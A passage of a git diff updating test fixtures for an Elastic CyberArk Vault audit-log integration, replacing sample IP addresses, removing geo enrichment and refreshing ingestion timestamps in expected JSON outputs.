Member\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577535700Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMP_ADB_AppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:21\",\"IsoTimestamp\":\"2021-03-14T12:57:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log index 7b0f9be88a0..85ca20fc3cb 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log @@ -1,2 +1,2 @@ -<5>1 2021-03-10T17:59:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:48","IsoTimestamp":"2021-03-10T17:59:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}} -<5>1 2021-03-10T22:19:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:23","IsoTimestamp":"2021-03-10T22:19:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}} +<5>1 2021-03-10T17:59:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:48","IsoTimestamp":"2021-03-10T17:59:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}} +<5>1 2021-03-10T22:19:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:23","IsoTimestamp":"2021-03-10T22:19:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log-expected.json index a67253c91df..ef28e482a25 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -37,7 +25,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -45,7 +33,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T17:59:48Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Remove Group Member", "target_user": "Administrator", "source_user": "PSMMaster", @@ -61,8 +49,8 @@ "event": { "severity": 2, "action": "remove group member", - "ingested": "2021-06-09T10:24:30.061938500Z", - "original": "\u003c5\u003e1 2021-03-10T17:59:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:48\",\"IsoTimestamp\":\"2021-03-10T17:59:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"266\",\"Desc\":\"Remove Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:43.685157200Z", + "original": "\u003c5\u003e1 2021-03-10T17:59:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:48\",\"IsoTimestamp\":\"2021-03-10T17:59:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"266\",\"Desc\":\"Remove Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Group Member\",\"GatewayStation\":\"\"}}}", "code": "266", "kind": "event" } @@ -74,19 +62,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -103,7 +80,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -111,7 +88,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T22:19:23Z", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Remove Group Member", "target_user": "Administrator", "source_user": "PSMMaster", @@ -127,8 +104,8 @@ "event": { "severity": 2, "action": "remove group member", - "ingested": "2021-06-09T10:24:30.061959300Z", - "original": "\u003c5\u003e1 2021-03-10T22:19:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:23\",\"IsoTimestamp\":\"2021-03-10T22:19:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"266\",\"Desc\":\"Remove Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:43.685166800Z", + "original": "\u003c5\u003e1 2021-03-10T22:19:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:23\",\"IsoTimestamp\":\"2021-03-10T22:19:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"266\",\"Desc\":\"Remove Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Group Member\",\"GatewayStation\":\"\"}}}", "code": "266", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log index ea1458e5874..6a20dacc257 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log @@ -1 +1 @@ -<5>1 2021-03-10T17:59:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:33","IsoTimestamp":"2021-03-10T17:59:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"273","Desc":"Remove Owner","Severity":"Info","Issuer":"Administrator","Action":"Remove Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Owner","GatewayStation":""}}} +<5>1 2021-03-10T17:59:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:33","IsoTimestamp":"2021-03-10T17:59:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"273","Desc":"Remove Owner","Severity":"Info","Issuer":"Administrator","Action":"Remove Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMSessions","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Owner","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log-expected.json index db754282a1a..82d2016ad8d 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -37,7 +25,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -46,7 +34,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T17:59:33Z", "safe": "PSMSessions", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Remove Owner", "source_user": "Administrator", "message": "Remove Owner", @@ -61,8 +49,8 @@ "event": { "severity": 2, "action": "remove owner", - "ingested": "2021-06-09T10:24:30.109364900Z", - "original": "\u003c5\u003e1 2021-03-10T17:59:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:33\",\"IsoTimestamp\":\"2021-03-10T17:59:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"273\",\"Desc\":\"Remove Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Owner\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"PSMSessions\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:43.869926900Z", + "original": "\u003c5\u003e1 2021-03-10T17:59:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:33\",\"IsoTimestamp\":\"2021-03-10T17:59:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"273\",\"Desc\":\"Remove Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Owner\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"PSMSessions\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Owner\",\"GatewayStation\":\"\"}}}", "code": "273", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-278-add-rule.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-278-add-rule.log-expected.json index 87c3b6113c7..f942646255c 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-278-add-rule.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-278-add-rule.log-expected.json @@ -55,7 +55,7 @@ "event": { "severity": 2, "action": "add rule", - "ingested": "2021-06-09T10:24:30.135488100Z", + "ingested": "2021-12-09T13:36:43.972786Z", "original": "\u003c5\u003e1 2021-03-11T18:01:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:01:14\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:01:14Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e278\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Rule\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePVWAAppUser\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Rule\u003c/Action\u003e\\n \u003cSourceUser\u003eAdministrator\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMUnmanagedSessionAccounts\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\2\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eAllow\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Rule\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:01:14\",\"IsoTimestamp\":\"2021-03-11T18:01:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"278\",\"Desc\":\"Add Rule\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Add Rule\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"PSMUnmanagedSessionAccounts\",\"File\":\"Root\\\\2\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Allow\",\"ExtraDetails\":\"\",\"Message\":\"Add Rule\",\"GatewayStation\":\"\"}}}", "code": "278", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-288-auto-clear-users-history-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-288-auto-clear-users-history-start.log-expected.json index b82232f003d..73b2242f20c 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-288-auto-clear-users-history-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-288-auto-clear-users-history-start.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "auto clear users history start", - "ingested": "2021-06-09T10:24:30.162223800Z", + "ingested": "2021-12-09T13:36:44.088513500Z", "original": "\u003c5\u003e1 2021-03-05T11:00:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 05 03:00:06\",\"IsoTimestamp\":\"2021-03-05T11:00:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"288\",\"Desc\":\"Auto Clear Users History start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Users History start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Users History start\",\"GatewayStation\":\"\"}}}", "code": "288", "kind": "event" @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "auto clear users history start", - "ingested": "2021-06-09T10:24:30.162256200Z", + "ingested": "2021-12-09T13:36:44.088521700Z", "original": "Mar 08 03:00:20 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"288\",\"Desc\":\"Auto Clear Users History start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Users History start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Users History start\",\"GatewayStation\":\"\"}}}", "code": "288", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-289-auto-clear-users-history-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-289-auto-clear-users-history-end.log-expected.json index a35f6c5a9a8..b9c3b31e63d 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-289-auto-clear-users-history-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-289-auto-clear-users-history-end.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "auto clear users history end", - "ingested": "2021-06-09T10:24:30.203966100Z", + "ingested": "2021-12-09T13:36:44.255396Z", "original": "\u003c5\u003e1 2021-03-05T11:00:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 05 03:00:06\",\"IsoTimestamp\":\"2021-03-05T11:00:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"289\",\"Desc\":\"Auto Clear Users History end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Users History end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Users History end\",\"GatewayStation\":\"\"}}}", "code": "289", "kind": "event" @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "auto clear users history end", - "ingested": "2021-06-09T10:24:30.203981100Z", + "ingested": "2021-12-09T13:36:44.255404400Z", "original": "Mar 08 03:00:20 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"289\",\"Desc\":\"Auto Clear Users History end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Users History end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Users History end\",\"GatewayStation\":\"\"}}}", "code": "289", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-290-auto-clear-safes-history-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-290-auto-clear-safes-history-start.log-expected.json index 7cac2b02e77..2dba10224d3 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-290-auto-clear-safes-history-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-290-auto-clear-safes-history-start.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "auto clear safes history start", - "ingested": "2021-06-09T10:24:30.239578300Z", + "ingested": "2021-12-09T13:36:44.417420500Z", "original": "\u003c5\u003e1 2021-03-09T09:00:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 01:00:47\",\"IsoTimestamp\":\"2021-03-09T09:00:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"290\",\"Desc\":\"Auto Clear Safes History start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Safes History start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Safes History start\",\"GatewayStation\":\"\"}}}", "code": "290", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-291-auto-clear-safes-history-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-291-auto-clear-safes-history-end.log-expected.json index abd0f2230ab..db7bc649ddb 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-291-auto-clear-safes-history-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-291-auto-clear-safes-history-end.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "auto clear safes history end", - "ingested": "2021-06-09T10:24:30.273314700Z", + "ingested": "2021-12-09T13:36:44.514883300Z", "original": "\u003c5\u003e1 2021-03-09T09:00:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 01:00:47\",\"IsoTimestamp\":\"2021-03-09T09:00:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"291\",\"Desc\":\"Auto Clear Safes History end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Safes History end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Safes History end\",\"GatewayStation\":\"\"}}}", "code": "291", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log index 2ea7c7cf132..8309f516cd2 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log @@ -2,9 +2,9 @@ <5>1 2021-03-08T18:24:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:49","IsoTimestamp":"2021-03-08T18:24:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"10.0.1.20"}}} <5>1 2021-03-08T19:20:02Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 11:20:02","IsoTimestamp":"2021-03-08T19:20:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store 